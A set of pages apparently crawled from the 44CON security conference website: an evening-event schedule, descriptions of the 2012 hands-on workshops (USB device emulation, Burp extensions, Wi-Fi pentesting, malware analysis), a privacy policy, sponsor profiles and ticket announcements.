          First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complementary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of Alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

          The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

          Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

          Looking for something more blue team than red? From 20:00, Phillipe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

          While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

          • Best billed idea
          • Most lame duck pitch
          • Most quackers concept

          Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

          If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

          Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature either in part or in hole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

          #####EOF##### Teile einen Link auf Twitter

          Teile einen Link mit deinen Followern

          Neu bei Twitter?

          Erhalte Updates von deinen Freunden, von Prominenten und Unternehmen, und erfahre, was es Neues in der Welt gibt.

          Was ist Twitter? Mehr erfahren.

          #####EOF##### 44CON 2012 Workshops – 44CON

          44CON 2012 Workshops

          Have you ever been to a killer talk or heard a fantastic webcast and thought “If I could only get my hands on and try this stuff I’d be all over it?” Well, when planning out 44con this year we decided to offer a unique chance to get some practical training sessions to you that will allow you to learn skills you’d pay a training company a small fortune. Unlike the talks, the workshops will not be on the DVD, so your only chance to acquire this knowledge is in person, kitted out with laptop, tools, and a caffeine-fuelled intensity appropriate to a monk who just escaped from the monastery and found the high street coffee house for the first time.

          We have some of the best in the industry sharing killer skills and techniques that will push you to the edge of your game and beyond. So, let’s step into the lab, and see what’s on the slab…

           

          Creating Fake USB Devices

          Presented by: Phil Polstra

          USB sticks get handed out at conferences, coffee shops, concerts, train stations and even family parties these days. But how do you know what is on that device given to you by that friendly market researcher? USB devices can be used not only to inject attacks through mass storage but also by emulating and exploiting peripherals such as mice, keyboards and scanners. Phil will explain how these devices can be created and used by the penetration tester and what to look for in an incident response.

          This workshop will get participants started on the path to creating their own USB devices.  The basics of how USB devices work and what has to be done to emulate them will be covered.  The FTDI Vinculum II chipset will be used for this workshop.  Participants will leave knowing how to build a fake mass storage device such as the USB write blocker Phil presented at Black Hat Europe 2012 or something similar and also knowing how to make a keyboard logger or similar HID device.

          Workshop Requirements

          Attendees should have their own laptop either running Windows or with Windows installed in a virtual box.

          Ideally each attendee would have a V2DIP1-32 development board and a FTDI debug board to use for this workshop.  The cost for these two items is about GBP20.


          Burp Plugin Development for Java n00bs

          Presented by: Mark Wickenden

          Burp Suite stands out as the de-facto attack proxy for web application assessments. Part of its power lies in the Burp Extender interface which allows “developers” to extend Burp’s functionality, including reading and modifying runtime data and configuration, trigger key actions such as Burp Scanner or extend the Burp user interface itself with custom menus and windows.

          That’s great, but I’m not a developer, I’m a webapp tester and I want the goodness too

          This practical workshop will take you from zero to hero even if you’ve never coded a line of Java in your life. Through some basic hands-on examples I will guide you through the process of getting your machine ready for coding, the key features of Burp Extender and how to use it to solve some real world web application testing scenarios.

          Topics covered:

          • The problem Burp Extender solves
          • Getting ready
          • Introduction to the Eclipse IDE
          • Burp Extender Hello World!
          • Manipulating runtime data
          • Decoding a custom encoding scheme”
          • Shelling out” to other scripts
          • Limitations of Burp Extender
          • Examples of really cool Burp plugins to fire your imagination

          The workshop will involve the installation of the Eclipse IDE onto attendee laptops. My intention is to distribute via a file share over wifi to save time downloading over the Internet. Alternatively I may provide the software and sample code on USB sticks if people are ok about putting them into their machines!

          All workshop notes and code will be made available to attendees on the day and on the Internet for wider consumption after the conference.

          Why

          Don’t be just another average tester. Optimise your webapp testing and don’t freak out when your client is using the latest funky compression algorithm which Burp doesn’t understand. Attend this workshop and get with the “program”.

          Workshop Requirements

          Attendees will require:

          • Laptop running Windows 7 (or OSX/Linux but I won’t be demonstrating with/troubleshooting these) with WiFi capability. VM is fine, if not preferred as software installation from an untrusted source (ie, me) is required.
          • Java Runtime Environment 6 or above
          • Burp Suite 1.4 and above (Professional preferred but Free will be ok)
          • Administrator rights to the machine as they will need to install software

          Some programming experience is assumed. My background is in Bash, Perl, PHP, Python and Ruby if that helps to gauge your own capabilities.


          Advanced Wi-Fi Security Penetration Testing

          Presented by: Vivek Ramachandran

          We see your SSIDs. We have enough traffic to extract your key hashes. We can inject and fake our way in using discovered credentials. But once you have this, how do you take it to the next level? In this workshop, Vivek will show how Wi-Fi is not just a way into the wired heart of the corporation, but can be used to control key corporate information security assets and pwn the entire network.

          This workshop will provide a highly technical and in-depth treatment of Wi-Fi security. The emphasis will be to provide the participants with a deep understanding of the principles behind various attacks and not just a quick how-to guide on publicly available tools. We will start our journey with the very basics by dissecting WLAN packet headers with Wireshark, then graduate to the next level by cracking WEP, WPA/WPA2 and then move on to real life challenges like orchestrating Man-in-the-Middle attacks and creating Wi-Fi backdoors for Fun and Profit!

          Details

          • WLAN Protocol Basics using Wireshark
          • Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs
          • Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, Understanding encryption based flaws (WEP,TKIP,CCMP)
          • Attacking the WLAN Infrastructure – Rogues Devices, Evil Twins, DoS Attacks, MITM
          • Advanced Enterprise Attacks – 802.1x, EAP, LEAP, PEAP, IPSec over WLAN
          • Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe-Latte, Hirte, Ad-Hoc Networks and Viral SSIDs, WiFishing
          • Breaking into the Client – Metasploit, SET, Social Engineering
          • Enterprise Wi-Fi Worms, Backdoors and Botnets
          • Wireshark as a Wireless Forensics Tool
          • Programming and Scripting Wireless packet sniffers and Injectors for fun and profit

          Why

          1. Trainer is author of the book – “Backtrack 5 Wireless Penetration Testing” which is now used as a guide to teach Wi-Fi pentesting and has discovered multiple attacks on Wi-Fi such as Caffe Latte attack, WEP cloaking cracking and Wi-Fi backdoors on Windows 7.
          2. Workshop is an advanced look into Wi-Fi pentesting in the enterprise on mechanisms such as PEAP, EAP-TTLS etc. which very few people know and understand well
          3. Every attack in the workshop will be shown as a live practical demo or a video – so participants will get a feel for how it is actually done, rather than death by PPT

          Workshop Requirements

          • Internet connection

          If you want to try some examples with Vivek using pcap files which will be provided, then you will need to have a BT5 R1/R2 installation – though this is not mandatory to follow the class


          OpenCL on .Net

          Presented by: Bob Weiss

          Ben utilized OpenCL for .Net for our software for the Enigma. This has broader applications for other crypto and computationally intensive applications. In this workshop we explore how the OpenCL library can be used to penetrate cryptographic protection systems and expose secrets that were thought impregnable!


          Malware Analysis 101: Malware Analysis with Cuckoo Sandbox

          Presented by: Michael Boman

          To analyze malware at speed you need the tools to do it consisting of an automated system that does all the hard work for you and the skills to interpret the results from the tool and the knowledge to enhance the tool to perform tasks it doesn’t yet know how to perform. This workshop will teach you to install and configure Cuckoo Sandbox, How to analyze samples and interpret the results and how to enhance Cuckoo Sandbox.

          Workshop Content:

          1. Installation and configuration of Cuckoo Sandbox
          2. Analysis of samples
          3. Review of sample reports
          4. Extending and enhancing Cuckoo Sandbox

          Malware Analysis 102: Manual Reversing of Malware

          Presented by: Siavosh Zarrasvand

          This workshop will teach you how to reverse basic malware, understanding the malware at assembly level and learn how to debug it. You will also learn how to packers work and some anti-debugging techniques.

          Workshop Content:

          1. Introduction to Assembly for reversers (means you won’t be able to write assembly, only read and understand it)

          Instructions, registers, flags, memory segments, etc

          1. Introduction to debugging

          Will go a bit deep into breakpoints, soft, hard, memory

          Short stop at patching

          1. Group exercise
          2. Packers, how they work
          3. Basic anti debugging techniques
          4. Group exercise on how to bypass basic anti debugging techniques. (Can be executed individually, depending on the will of the audience)

          Using relationship data to unseat undetected persistent malware

          Presented by: Michael Viscuso

          Most defenders claim that the digital defenders are at a serious disadvantage to attackers. The defender must be perfect. If he makes a single mistake, or leaves one door open, he will lose. The attacker on the other hand just has to be correct once, and can try, and try, and try again until he is. What’s worse, says the defender, is that when the attacker is successful, it’s incredibly difficult for the defender to find him. More often than not he has to make a mistake or fall behind the curve in order for the defender to find his presence.

          Today we are going to turn the tables. After learning the techniques presented in this workshop, you will be finally be able to leverage new research findings against historical data to identify morphing malware and advanced persistent threats.


          NIPS and Tatties

          Presented by: Arron Finnon

          The ‘Network Intrusion Detection/Prevention Systems’ (NIDS/NIPS) market can be a complicated place, even for a seasoned security professional. People in reality could think themselves more than justified in saying “they’re useless”, especially in the wake of countless network compromises. It’s hard to avoid a situation, past or present where total network compromise has came to light even though NIDS/NIPS had been in place. Their purpose by name alone is clear, they’re there to prevent and/or detect intrusions.

          Depending on how you look at it, I have been fortunate or unfortunate enough to be involved with NIDS/NIPS for some time – although my involvement hasn’t been within the world of vendors and products, but detection and mitigation. NIDS/NIPS devices have, and rightly so, faced a lot of criticism over the years. NIDS/NIPS have been “dead for a number of years” some have said, which has always amazed me. Especially as they’re deployed in large numbers since those obituaries were written. In some cases they’re deployed to satisfy compliance, and in other cases they’re there to actually defend. Still the facts are as follows:

          – They do have a place and a purpose

          – They don’t always do what they claim

          – The security community will continue to moan about them not being a “silver-bullet” solution.

          This workshop looks at the current situation that surrounds the murky world of vendor spin and Intrusion Detection/Prevention Systems. Discussing the potential avenues that as a security community we can take, to gain some control over a lost situation. The ability to deploy simple and effective tests to gauge your own reactions to attempts to subvert your detection system is beneficial in its own right. Adopting an approach where detection rates outweigh network performance figures may also give a better understanding of signs of attack.

          However either way, having your own facts and figures to discuss issues with vendors is priceless.

          If NIDS/NIPS are a “no silver bullet solution” then a more hands on approach is required. By no means is this workshop going to secure your network overnight, and it is no grantees that some blackhat will fail or succeed. The aim of this workshop is to plant a seed, allowing people to walk away finding that more questions need to be asked of their detection systems, and so we must find a better way of asking them. Hopefully, attendees will leave with at least one major question niggling at their sub-consciousness: “What questions would an IPS hacker ask a vendor?”


          Get More From Your Pentest The Tiger Scheme Way

          Presented by: Steve Lord

          This is an interactive 90 minute workshop for end users of penetration testing from the day to day security ops guy up to the CSO on how to get more from your security test. Lots of people get security tests done and have a fairly ingrained workflow at their end. Often this means copying and pasting from a PDF into a document into a spreadsheet and a whole load of other mundane tasks while the report sits on the shelf. As a customer, you deserve better from us pentesters.

          Over the course of the workshop we’ll start with the penetration test cycle, including developing actionable intelligence and integration with your forensic readiness capabilities, I’ll take you through a typical Internet-facing penetration test from start to finish from the provider view, walking through actual pentest output, our small and big methodology documents and a real report. This will be followed by an open discussion on things that we as pentesters can do to make things better.

          If you’re a penetration tester please do feel free to come along, but bear in mind that if it’s fairly busy in the workshop I might ask you to leave so that more end users of penetration testing can come in.

          Details

          The workshop will is interactive. It’s part classroom format but do ask questions and the second half is fully interactive, so if you don’t ask questions I might accidentally Nerf you. As expected, I will be strict on time as I’m sure people will try to Nerf me if I run over, and rightly so! The topics covered in the workshop include:

          • Penetration testing and other related processes
          • Integrating processes with your penetration testing
          • Actionable intelligence
          • Setting goals
          • Scope and rules of engagement
          • Schemes, badges and certifications
          • Methodologies
          • A typical penetration test
          • Threat ratings, traffic lights and voodoo
          • The wash-up
          • Handling findings (snog, marry, avoid)
          • Information sharing and intelligence management
          • The known knowns we can help with
          • The known unknowns we might be able to help with
          • The unknown unknowns (or over to you)

          Shamelessly stealing from Stephen Bonner I will be handing out sweets/choccies to people that ask questions or have confessions to make. As such, this workshop will most definitely not be filmed, and will operate under the Chatham House rule.

          Why?

          I’ve been a penetration tester for over a decade as well as a customer in the past. I also invigilate QSTM exams and occasionally review reports by other testers. I interact with security teams across various sectors around the world with budgets ranging from a chalk outline of a shoestring to millions of pounds on a daily basis. As such I get a lot of sight of the things people do, the things that work and the things that fail and even worse, the things that fail so hard the organisation has to migrate to the ostrich paradigm and work around the problem rather than admit fault and fix it. If you’re someone that uses penetration test reports and you find you have a keyboard or desk-edge shaped wedge in your forehead from dealing with either processes or fallout, this is probably a good workshop to attend.

          Attendees will need to bring

          The ability to interact (i.e. no major restrictions on sharing anonymised anecdotes about their experiences with attendees)


          SecBiz Workshop – Bridging the Security/Business Gap

          Presented by: Rafal Los

          Too many security professionals struggle for relevance in their organizations. The primary reason for much of this struggle is the significant disconnect between the goals of protecting the business, and actually conducting business. After countless conversations with security professionals in organizations large and small, it has become apparent that the security community needs a course on aligning security and business values, and understanding exactly what you’re protecting before you can answer how. If you’re frustrated, and feel disconnected from the business you serve as a security professional you need to be in this workshop. In a collaborative environment we will work through your organization’s goals, your actual security objectives and give you the tools and perspective to be a better agent of change, and to allow you to understand what it is you’re protecting before you start to formulate a strategy of how. In the spirit of Security BSides, there will be no spectators so if you sign up, please be ready to participate, and have as much of the pre-work ready as possible.

          Requirements before the workshop:

          Attain (through interview, or other information gathering) the following information:

          • Corporate mission statement
          • The organization’s yearly, and quarterly goals (as accurate as possible)
          • Your Information Security strategic goals for the current & next Fiscal Year (FY)
          • Your information security budget (doesn’t need to be specific dollar amounts, or vendor names… only ‘what do you spend money on?’)
          • The business’s top 3 “gripes about security”3 recent relevant business events in your industry (product recall of a competitor, industry buzz, etc)
          • 3 recent relevant information security events in your industry
          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favorite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### DSC_4836-1 – 44CON

          DSC_4836-1

          #####EOF##### 44CON Privacy Policy – 44CON

          44CON Privacy Policy

          This is a very boring document, but don’t let it put you off.

          TL:DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

          Sense/Net Ltd (“44CON”) Privacy Policy

          We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

          • to access your information and to receive information about its use.
          • to have your information corrected and/or completed.
          • to have your information deleted.
          • to restrict the use of your information.
          • to receive your information in a portable format.
          • to object to the use of your information.
          • to withdraw your consent to the use of your information.
          • to complain to a supervisory authority.

          When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

          Data Protection Officer: Marizel Fourie

          To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

          Data collected

          We collect the following pieces of information:

          • We use cookies on websites for analytics, marketing and support.
          • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
          • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
          • Country of origin, Email address, name and any information you provide when using our CFP system.

          Your information is shared with the following third-parties:

          • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
          • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
          • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
          • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

          Your information is not shared by us:

          • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

          On consent

          When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

          You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

          Use of collected data

          How we use your information:

          • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
          • In order to meet contractual obligations.
          • Improving our systems and marketing through the use of analytics.
          • Advertising goods and services.
          • To fulfil legal obligations under the laws of England and Wales.

          How long we retain it for (in order of importance from most to least):

          • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
          • As long as we need it in order to perform the functions above.
          • As long as consent is not withdrawn (e.g. our announce list).

          How we secure your information:

          • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
          • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
          • We try to avoid collecting information where practical.

          Transfers of information outside of the EU:

          As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

          Sensitive Personal Information

          We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

          #####EOF##### 44CON 2017 Sponsors – 44CON

          44CON 2017 Sponsors

           

          Platinum Sponsors

          Falanx Cyber Defence

          Falanx Cyber Defence protect and defend businesses across all key sectors against global cyber security threats. Using their expertise, vigilance, and the latest tools and technology, Falanx Cyber Defence help companies fight against the ever-increasing risk of cyber attacks with a full service model that provides end to end coverage.

          The increased risk of cybercrime and the very public risk involved in reputation, earnings, and share price of affected companies means a new defined approach is needed. With GDPR arriving in 2018, increasing the DPA responsibilities of many organisations, there is a defined need to ‘do compliance better’, starting with understanding networks and platforms much better than most technology allows today.

          In response, Falanx Cyber Defence have brought together the latest technology stacks to develop MidGARD, a new Managed Detection & Response platform which is redefining risk analysis by offering world class remediation.

          MidGARD has been built to fully manage and detect cyber threats, providing analysts with the ability to investigate and intervene quicker and with more capability than ever before.

          The MidGARD platform
          MidGARD offers major security analytical capabilities by rethinking how we handle event data. SOC analysts working with MidGARD are seeing major increases in capability and reactive event handling. Backed up by monitoring and response capability from Falanx’s own SOC in the UK, MidGARD provides a dependable security enforcement layer.

          MidGARD meets and exceeds the expectations of enterprise and Government enterprise and cloud ready networks whose risk appetite face ever exceeding compliance, regulatory and privacy needs.

          MidGARD is also available as an SME appliance in a smaller form factor, the MicroSOC, offering the same world class features in a small form unit.

          Prices available on application.

          Why MidGARD?
          • Market-leading speed and scalability
          Built on big data foundations by security analysts, MidGARD is staggeringly quick and fully scalable whilst API friendly, offering major extensibility.

          • Cutting-edge technology
          With advanced capabilities built around machine learning, AI, and microservices, to help accelerate the process of identifying and responding to threats. React faster than ever before.

          • Data enrichment engine
          The data enrichment engine in MidGARD allows analysts to enrich base level data with additional context, improving the value of information and therefore the intelligence that can be gleaned from it.

          • Interactive ChatOps Speeds Reactive Capability
          MidGARD’s integration of ChatOps makes it easy for analysts to work together in one window to identify and respond to threats in real time, and share their intelligence with clients and colleagues.

          • A dynamic match for malicious hackers
          MidGARD’s integration of emerging tech matches the sophisticated technologies adopted by malicious hackers, making for an infinitely scalable, dynamic and agile platform

           Gold Sponsors 

          Beyond Security

          https://www.beyondsecurity.com/ssd.html

          SSD provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers, for researchers and will give you the fast response and great support you need to make top dollar for your discoveries. We are looking to acquire zero-day vulnerabilities, in different stages of research, affecting major operating systems, software, devices and report them to the vendors and to our clients. We believe researchers need to get paid for their efforts, that’s why we (Beyond Security) will acquire your research (money guaranteed) and report the vulnerabilities for you.

          You can read the SecuriTeam blogs here.

          Silver Sponsors
           

          Immersive Labs

          www.immersivelabs.co.uk

          We have built an online cyber skills portal which enables individual users to stream hands-on practical exercises. Individuals can login and choose from 100s of individual cyber skills to develop. Skills include ethical hacking, secure coding, reverse engineering, SOC analysis and cyber investigations.

          We crowd source labs from experts around the world. We employ social and gamification features and update labs weekly. Only a browser is required.

          Immersive Labs will be running this year’s CTF.

           

          Cortex Insight

          cortexinsight.com

          Cortex Insight’s easy-to-use threat and vulnerability management platform solves the complex Cybersecurity problems plaguing enterprises:

          • Too many vulnerabilities but not enough meaningful context!
          • Too much data but not enough useful information!
          • Too many silos but not enough risk remediation!
          • Cortex Insight works with your existing security solutions to help you maximise value.
          • Cortex Insight prioritizes vulnerabilities that pose actual risk to your business—not in theory, but in the real world.
          • Cortex Insight provides meaningful information on your vulnerabilities and prioritizing them based on a number of factors—not just risk scores

          For more information or to request a demo contact: info@cortexinsight.com

          Or come and speak to us at 44CON 2017 in the Cortex Insight Cafe

          Amazon

          amazon.jobs/infosec

          At Amazon, we are obsessed with customer trust. Information Security maintains this by guarding the confidentiality and integrity of Amazon and customer data. We assess risk, classify data and systems, detect potential intrusion, and render useless the value of data that may be leaked.

           

          Our teams span over 10 countries worldwide, and our focus areas include: security intelligence, application security, incident response, security operations, risk and compliance, acquisitions and subsidiaries, and external partner security. Our mission includes instilling awareness to safeguard all customer and employee data, applications, services, and assets. To accomplish this, we collaborate with Amazon organizations to build security best practices into enterprise wide systems. Our guidance and leadership equip our partners to maintain high security standards.

           

          We’re hiring top security talent around the globe. Visit amazon.jobs/infosec today. Stop by to meet our team, register to win Amazon prizes, and join the fun!

           

          BT

          www.bt.com

          With operations in over 180 countries supporting some of the world’s largest companies, nation states and critical national infrastructures, we have a unique perspective on cyber crime. Our front line position means that we see how and where attacks come. We’re constantly watching, learning, predicting and responding to the latest threats to protect our customers and BT.

          We know that a cyber attack can destroy a reputation overnight. We also know that security is the number one digital enabler, allowing a business to run at speed and to build customer trust and investor confidence.

          So we’ve built a team of 2,500 security experts in 14 global centres. It’s the same people who protect our business who also protect yours. This team use unique tools and insight to stay one step ahead of criminal entrepreneurs.

          As a global leader of Managed Security Services, we’re helping customers thrive in a digital world, by delivering world-class security solutions. These are underpinned by our professional services support, cloud of clouds strategy and excellent customer service.

           

           Microsoft

          www.microsoft.com

          Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services, and solutions that help people and businesses realise their full potential. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organisations helping to protect customers and the broader ecosystem.

           

          Other Event Sponsors

          Integrity

          www.integrity.pt

          INTEGRITY is an ISO 27001 certified and CREST member company. Our vision is to deliver worldwide innovative Information Security services on Auditing and Consulting where we provide our full expertise on the structuring and delivery of InfoSec value- added services, combining our expertise and our proprietary GRC Technology for a consistent and effective cyber risk reduction process for our clients. Such comprehensive services include persistent Pen-Testing (www.keepitsecure24.com), ISO 27001 (www.27001manager.com) and Third Party risk management (www.infosecrating.com) solutions supported by our GRC Platforms (www.integritygrc.com).

           

           

          Intezer

          www.intezer.com

          The only solution replicating the concepts of the biological immune system into cyber-security. Intezer provides enterprises with unparalleled Threat Detection and accelerates Incident Response.

          Our current offering includes:

          Intezer Code Intelligence™ solution:  Cloud API service for rapid file investigation, accelerating incident response/SoC operation.

          Intezer Immune System solution: an advanced, one-of-a-kind Threat Detection solution providing unparalleled level of control over the enterprise systems.

          With Intezer solutions, organisations get the most advanced protection against Fileless malware, APTs, code tampering and vulnerable software.

          Founded by the founder of CyberArk and IDF Cyber-security specialists.

          Tigerscheme

          www.tigerscheme.org

          Twitter: @tiger_scheme

          Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

          Tigerscheme was founded in 2007, on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring in a recognised and reputable company.

          Tigerscheme provides for career progression through entry level certification, intermediate level certification, and senior and technical specialist roles. Certification under Tigerscheme provides a formal recognition of an individual’s skills, and is awarded on the basis of a rigorous independent assessment against published and widely-accepted standards.

           

          Bugcrowd

          www.bugcrowd.com

          Bugcrowd delivers the ultimate in security assessment for the enterprise. The pioneer and innovator in crowdsourced security testing for the enterprise, Bugcrowd combines the power of more than 60,000 security researchers and its proprietary Crowdcontrol™ platform to surface critical software vulnerabilities, and level the cybersecurity playing field. Bugcrowd provides a range of public, private, and on-demand options that allow companies to commission a customized security testing program to fit their specific needs.

          CheckSec

          www.checksec.com

          Canopy: Make Reporting Great Again!

          Writing reports shouldn’t be hard. But for most of us, it’s a pain and the least fun part of our job. Canopy doesn’t make reporting fun, but it does make it a whole lot easier. 

          Stop by to say hello. Stay for a demo. 

          CheckSec: builders of Canopy and proudly sponsoring 44CON since 2012!

          Event Partners
          Antipøde

          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts – Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder – it became quickly apparent after moving to London that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple: to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### 44CON 2019 Early-Bird Tickets are now on sale – 44CON

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          #####EOF##### Early Bird Tickets Sold Out! – 44CON

          Early Bird Tickets Sold Out!

          We opened our Early Bird Tickets last week and kept it quiet to give people a chance to get them, then when we announced them on our mailing list they went within an hour!

          If you missed your Early Bird Tickets, fear not. Our CFP is still open. If you have a great workshop or talk idea, don’t forget that accepted talks and workshops include free attendance (and in most cases cover travel and accommodation from anywhere in the world). We wrote a blog post on how to boost your chances here.

          If you’re itching to buy a ticket, regular tickets open at 8am GMT on the 10th of March, and will be available in our online shop.

          #####EOF##### 44CON Privacy Policy – 44CON

          44CON Privacy Policy

          This is a very boring document, but don’t let it put you off.

          TL:DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

          Sense/Net Ltd (“44CON”) Privacy Policy

          We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

          • to access your information and to receive information about its use.
          • to have your information corrected and/or completed.
          • to have your information deleted.
          • to restrict the use of your information.
          • to receive your information in a portable format.
          • to object to the use of your information.
          • to withdraw your consent to the use of your information.
          • to complain to a supervisory authority.

          When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

          Data Protection Officer: Marizel Fourie

          To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

          Data collected

          We collect the following pieces of information:

          • We use cookies on websites for analytics, marketing and support.
          • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
          • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
          • Country of origin, Email address, name and any information you provide when using our CFP system.

          Your information is shared with the following third-parties:

          • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
